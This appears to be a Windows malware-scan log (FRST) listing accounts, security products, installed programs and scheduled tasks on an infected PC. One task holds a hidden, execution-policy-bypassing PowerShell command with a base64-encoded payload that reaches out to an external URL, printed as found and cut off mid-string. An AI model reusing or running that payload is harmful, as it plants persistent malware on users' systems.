Guest (S-1-5-21-1436452318-2580999886-2786755032-501 - Limited - Disabled)
hakim (S-1-5-21-1436452318-2580999886-2786755032-1005 - Limited - Enabled) => C:\Users\hakim
MuhammadAkim (S-1-5-21-1436452318-2580999886-2786755032-1001 - Administrator - Enabled) => C:\Users\MuhammadAkim
sesay (S-1-5-21-1436452318-2580999886-2786755032-1003 - Limited - Enabled) => C:\Users\sesay
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Bitdefender Antispyware (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.3.183.90 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 19.2.0.151 - Bitdefender)
Blender (HKLM-x32\...\{1115EF75-E8C1-4BA1-829F-1B8460D47701}) (Version: 2.76.2 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version:  - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.1.170 - Broadcom Corporation)
Chromium (HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Chromium) (Version: 46.0.2480.0 - Chromium)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix)
Coyote The Outlander (x32 Version: 3.0.2.59 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.9.5009 - CyberLink Corp.)
CyberLink PowerBackup 2.6 (HKLM-x32\...\InstallShield_{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.6.2.1307 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.6.4930 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.3.0 - Dropbox, Inc.)
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Evernote v. 5.8.1 (HKLM-x32\...\{4FD2D1C8-8636-11E4-9D21-00163E98E7D6}) (Version: 5.8.1.6061 - Evernote Corp.)
Foxit PhantomPDF (HKLM-x32\...\{4E32271C-B55A-4CDF-8DB7-88FD1C45927C}) (Version: 7.0.310.226 - Foxit Software Inc.)
Gameo (HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Odyssey 2 in 1 Pack (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{4BF17F05-B2DA-4266-8AEB-09BC9D008EAF}) (Version: 1.3.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7960.5089 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.39 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Insane Cold: Back to the Ice Age (x32 Version: 3.0.2.59 - WildTangent) Hidden
Inst5675 (Version: 8.01.39 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.39 - Softex Inc.) Hidden
Intel® Chipset Device Software (x32 Version: 10.0.14 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.30.1072 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation)
iTunes (HKLM\...\{FBEB98F8-64E4-4FA3-A15E-4A9F42FF962E}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java 8 Update 71 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418071F0}) (Version: 8.0.710.15 - Oracle Corporation)
LaunchDIY_Update (HKLM-x32\...\{E651B3B6-6379-4FB5-BDC1-9E7BCFA20ABC}) (Version: 1.01.001 - LAUNCH)
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
LSDCDriverIntall (HKLM-x32\...\InstallShield_{CE0DB043-A252-4119-BD9E-1F0E27F1725A}) (Version: 1.00.0000 - Your Company Name)
LSDCDriverIntall (x32 Version: 1.00.0000 - Your Company Name) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4787.1002 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mystery Expedition: Prisoners of Ice (x32 Version: 3.0.2.59 - WildTangent) Hidden
NowUSeeIt Player (HKLM-x32\...\{B1929100-0FD2-40A0-A385-1344D2651760}) (Version: 1.6.2.2 - NowUSeeIt Player)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
Paladins (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF402}) (Version: 0.13.785.1 - Hi-Rez Studios)
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29084 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.37.1119.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
Rory's Restaurant (x32 Version: 3.0.2.59 - WildTangent) Hidden
Royal Envoy Double Pack (x32 Version: 3.0.2.59 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Screencast-O-Matic v2.0 (HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Screencast-O-Matic v2.0) (Version: v2-1.8 - Screencast-O-Matic)
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.109 - Skype Technologies S.A.)
Solitaire Mystery Four Seasons (x32 Version: 3.0.2.51 - WildTangent) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Trove (HKLM-x32\...\Steam App 304050) (Version:  - Trion Worlds)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Smartly Dressed Games)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.14 - WildTangent) Hidden
Windows Driver Package - LAUNCH (usbser) Ports  (09/20/2013 1.2.0) (HKLM\...\3759075FAEFA0B24F379EF0A07B04C7C06C74D0D) (Version: 09/20/2013 1.2.0 - LAUNCH)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {000C2A75-CBC4-4BC7-A9C4-070486FDCD2C} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-01-15] ()
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {0C66856B-2EC1-4650-9F60-0D3C51D073ED} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [2015-01-30] (Hewlett-Packard)
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {0F7474FC-A7C3-47B9-B9C3-2C89A5CF7613} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Opt-in For HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2014-08-22] (Hewlett-Packard Company)
Task: {2901C585-38A6-4BFF-81E4-A7E56076AC80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {34B91E30-A000-41AA-86ED-47977E230D7B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-08] (Google Inc.)
Task: {34FAAC01-9988-4B7B-AA01-B4575F039755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {3844BEEF-CF70-4844-B33C-7F055DC53979} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-08] (Google Inc.)
Task: {3D22F0BC-A3AB-4043-8454-530F057F30F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {4B2533A6-EC3C-4270-8879-74F1C821B8F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {544FA89D-47B6-43D4-B29C-58A102D76A16} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)
Task: {5EA8989E-695C-4128-8D41-5A39AE1FD699} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-12-03] (HP Inc.)
Task: {611A173B-24FB-43F7-AF35-BBB5C899C7F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-12-03] (HP Inc.)
Task: {70892899-6FC8-4769-94C5-D14C9F5BB3B3} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-01-21] (Microsoft Corporation)
Task: {7A799A83-C38F-4E8D-9AD7-E9BF8C22C08E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-13] (Microsoft Corporation)
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
Task: {9D92E479-7808-4524-A838-65C11FFA0AC4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-06-24] (Hewlett-Packard)
Task: {A183184B-C1D5-4B8E-9471-0191AB50002B} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [2015-01-30] (Hewlett-Packard)
Task: {AE277527-634A-40A0-BD99-54EC59953EAE} - System32\Tasks\File History (rehydration) - S-1-5-21-1436452318-2580999886-2786755032-1001
Task: {B250CE2D-D65C-440B-A962-7F961BE2DAA6} - System32\Tasks\YCMServiceAgent => c:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2015-01-29] (CyberLink Corp.)
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAZQBhAHUAdAB5AGYAaQBsAGUALgBpAG4AZgBvAC8AdQAvAD8AYQA9AC0ATwBuAGgARwBxAFMAYwBFAHoAaAAyAHQANABjADIANAB2ADMAQQAyAEMAUABIAHoAQgA0AC0AUABqAF8AVAAtAFcASgA4AFAAYwBzAEQARABsAHMAcQAzADcANgBJAEUAMgBmAHQAXwBpAFgAVgB2AGsAbgA2AHUAVQBTAHkASwBpAGYALQA0AGgAQQBGAFQAMwBnAHoAUQAxAFkAQwBrADIAcABWADUATABlAGIAOABmAEkAdQBOADkATgBaAGkAbABZAFIAMQBwAEQATgBJAEYAdgBKADgAQwBZAEgARgBMAEgAcwBPAGMARQA1AEMAXwBmAFUAQQBwAHkAbABUAGQAUgB4AEoAMwBGADUANABGAHgAeABTADgAcgBVAGsAVwBYAEUAWQB3ADYAUgBMADIAOQBOAEUAeQBjAEYATgBGAFEARABlAEEAVwBzAEUATABIAHoAZAB0AGQATQBHADMAMgBsAEIAQQBqADMATABFAEYAdwB6AFgAMwB1AEgANQBpADcAdwBOAFoAcgBlAGMAaAA0AGQAUAB2ADcARABfAFUAZQByAFAAQgBZAEYAVQA2AFkAYgBQAE0ARABVAEkAUwBSAHUAMQA0AFgATAA5AE0AYgBBAHoARQBsAFEAZABoAHcAaQA1ADEAUgBEAEMAdwAtAFcATgBnADcATgBaAHgAbgBQAHUAaQB1ADcANQB0AFUAbwBzADAAUgA3AG4AegBuAEYASQBoAEkARQBqAHcAaAAwAFoAZgBlAEMASQBuAHEAYgAtAGYAdwBJADgAUQBpAG0ASQB3ADIATQBqADQAQgBZAEgAbwBkAFQAQQAzAFcASwBQAEYANgBXADMARwByADAAagBFADMANAAxAGUAZwAwAEYAZABfAEcATABkAHgAcABGAHgASQBxAGUAXwBHAEoANwBvAE4AdgAxAGIAbgBsADYAUQBnAEwAdgBUADgAUABQAC0AYgA2AHQAaABsADgANQBlAHkAcQBGAEoAOABHAGoATwBpADYAZABwAG4AcwBwAGMAXwBUADQAUwBrAHEAbgBfAEoAdwBMAFgAQQBTAEEAeQBiAFQAagBzAEgAYgA3AHcAbQBwAEsAVABxAHYAdgA0AHcAWABuAEIAYgB1ADMAUwBmADUAbwBSAFIATgBsAG8AdQBlAEMARgBzAG8AYgBIAFQARgA1AGgASgBSAF8AQwBiAFEASQBzAHcASwBRAHgAYwBUAG0AVABqAEQAdwBWAG8AawBDAFUANwBsAGUAQgBUAGoAQwBKAHgAMQBBAC0AaQA2AGUAMABUAGMAMgBwAHEASQBUAFYAUAA3AHgASgA2AEcAWQBwAGUAbgA1AHoATwBZAG8AVgBfAFAAUAA0AGMAeQBxADcASAAyAFIASQBEAGkAYQBqAGIAVwAtAE4AdQBXAG0AeQBaAGEAWABTAGUAbQB1AFQAMQBxAEMAXwAtAFoARABoAFIAQQBiAFUAWABsAHcAMwBLAHUAUQBWAEIAbgBfADMARABLAEcAdwAyAHUAZQBqADIARwB0AEwAUQBpAHEAawBCAG4ATwAtAEwANQBjAHQAawBxAEcANAAzAHYAagB5AGIAUQBLAHQAdABSAFAAbgA0AHMAMQBQAGQAOQBIAEgAdQBHAHEAVwBHAEgAdQB6AFoAeQBqAGIAdwBMADUALQBrAEMAawBWADcANwB4AHIAcwBiAFcAdABkAEIAdwA5AEYAbwB6AHEAUABCAFUAZwBpAGUAMwBVAHAAWQBjAEgALQBHADYARABZAHIAbwBvAHQAQwBuADgAeABmAFcAeABJAEYARQBOAEkAdABPAEoAYwBlAFMAcQA3AHcAVQBQAGQAagBfAC0AZgBQAEgAMwB5ADQAegBZAFYATwAxAGkATAAxAEcAdwAwAEQATABsADAANABQAEsAegBSAGUAMwBCAGwAbQBKAEsATQBuAF8ANABsAEIAbQBqADkAUQBQAGcAdgBsAG0AYwA3AGcAYwBpAEYAUABCAEYAYgBnAF8AcQByAEkAbwB3AGgAYQBEAE4ARQA4AHoAcgBJAFYANQB4ADEAVABBAEMAeQBoAHIANwBJAEYATABkAFcAUgBkAGcARQBqAFUAdABaAFoANQBUADgAegBQAG4ATwBIAEUAdQBvAG4AaABHAGoAUwBhAHEAaQBHAG0ARQBUAEEAcQBMAGYAMQBTAEwAbgBZADgAbgBrAGMAdAA5AHYARwAzADkAdQB3AC0ANgBuAFYAMAA4AE0AZABvAEkAZwAyAE8ANQBIADMAUAB2AGwAbABnADEASQBVAHAAMgAwADUANABPAGUAMAB2AE0AQwBuAFUASABtAF8ARgBCAFYAMABkADcANwBSAGcAMwB0ADYAeQBZACYAYwA9ADgAaQBlAHYAbQBzAHEAeQBVAHcAdQAwADAAYQBEAHAAXwBTAE8AMAA4ADYASwBXAEsARABQAE4AZQBaAGQATAByAFQARQA4ADYASQBUAFIASgBQAGEALQBfAHUAaQBsAGoANABfAE4ARQBxAHEAQgB